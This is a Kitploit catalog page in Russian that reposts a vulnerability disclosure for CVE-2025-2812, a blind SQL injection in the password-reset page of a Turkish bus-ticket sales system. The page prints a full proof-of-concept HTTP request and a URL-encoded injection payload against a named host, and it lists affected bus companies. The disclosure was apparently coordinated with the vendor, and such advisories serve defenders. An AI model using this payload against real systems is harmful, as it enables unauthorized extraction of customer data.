Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2812 — CVE-2025-2812 SQL Injection | Kitploit
Инструменты/GitHubGitHub/sahici/cve-2025-2812
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingDatabase Security
GitHubsahici/cve-2025-2812

CVE-2025-2812

CVE-2025-2812 SQL Injection

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2025-2812 — Уязвимость SQL-инъекции в "Bilet Satış Otomasyonu" от Mydata Bilişim Ltd. Şti

📌 CVE-ID: CVE-2025-2812
📢 Уведомление USOM: tr-25-0099
🛡️ Тип уязвимости: CWE-89 — SQL-инъекция (Boolean-based Blind)
🏢 Затронутый продукт: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 Пример целевого URL: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php


🔍 Сводка об уязвимости

В продукте "Bilet Satış Otomasyonu" на странице сброса пароля (SifremiUnuttum.php) в параметре "Adınızın ilk harfi" (ilkHarf) обнаружена уязвимость Boolean-based Blind SQL Injection. Эта уязвимость позволяет извлекать данные из системы без имени пользователя или пароля.

Данная уязвимость затрагивает системы следующих автобусных компаний:

  • Balıkesir Uludağ
  • Kontur
  • Efe Tur
  • Kale Seyahat
  • +20 компаний

💥 PoC (Proof of Concept)

📌 HTTP Request:

root@kitploit:~
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************

🧪 Используемый Payload:

root@kitploit:~
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW

🧠 Технические детали

  • Уязвимый параметр: ilkHarf
  • Метод: Boolean-based Blind SQLi
  • Тип уязвимости: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

🙏 Благодарности

После обнаружения нами уязвимости в продукте "Bilet Satış Otomasyonu", разработанном "Mydata Bilişim Ltd. Şti", данная уязвимость, объявленная под кодом CVE-2025-2812, была опубликована в координации с производителем и USOM. Мы гордимся тем, что внесли вклад в сообщество кибербезопасности в этом процессе.

После уведомления об уязвимости Mydata Bilişim Ltd. Şti быстро выполнила все необходимые процедуры, закрыла соответствующую уязвимость и интегрировала дополнительные меры безопасности в свои системы. Благодарим их за проявленную прозрачность, сотрудничество и чувство ответственности.

Мы гордимся тем, что внесли вклад в сообщество кибербезопасности в этом процессе.


📬 Контакты

По любым вопросам, отзывам или предложениям о сотрудничестве вы можете связаться со мной:

  • 📧 E-mail: [email protected]
  • 📷 Instagram: @yyasar.yasin
Скачать инструмент